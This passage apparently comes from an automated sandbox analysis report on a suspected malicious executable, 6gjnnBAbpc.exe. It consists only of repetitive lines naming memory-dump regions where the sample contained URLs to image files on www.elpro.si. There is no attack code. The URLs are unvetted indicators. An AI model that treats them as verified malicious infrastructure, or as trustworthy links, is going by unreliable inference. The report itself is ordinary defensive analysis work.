00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/12/wika-19-150x150.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/12/wika-19-300x300.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/01/ebro.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/02/Untitled-design-4-1170x658.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/02/Untitled-design-4-1536x864.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/02/Untitled-design-4-355x200.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/02/Untitled-design-4-585x330.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/02/Untitled-design-4-600x338.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/02/Untitled-design-4-64x36.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/02/Untitled-design-4-768x432.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/02/Untitled-design-4.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/03/Izdelek-brez-naslova-2-1170x658.png
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/03/Izdelek-brez-naslova-2-1536x864.png
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/03/Izdelek-brez-naslova-2-355x200.png
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/03/Izdelek-brez-naslova-2-585x330.png
